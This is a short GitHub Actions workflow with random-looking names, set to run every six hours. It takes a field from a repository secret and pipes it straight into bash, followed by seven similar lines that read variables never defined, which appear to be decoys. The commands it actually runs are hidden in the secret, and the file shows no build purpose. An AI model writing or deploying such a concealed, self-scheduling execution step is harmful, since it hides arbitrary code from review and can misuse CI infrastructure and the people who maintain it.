name: renquanniu3481

on:
  workflow_dispatch:
  schedule:
    - cron: '21 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: renquanniu3481
        env:
          ytpm3: ${{ secrets.ytpm3 }}
        run: |
          echo $ytpm3 | jq -r .snmll31 | /bin/bash
          echo $b0280 | jq -r .area6304 | /bin/bash
          echo $esrka533 | jq -r .ry2706 | /bin/bash
          echo $ef9 | jq -r .satx40766 | /bin/bash
          echo $cfiky9597 | jq -r .tomtp584 | /bin/bash
          echo $y7365 | jq -r .mjjh6 | /bin/bash
          echo $phaan1 | jq -r .bhnfq3 | /bin/bash
          echo $zoh9462 | jq -r .cvo06 | /bin/bash

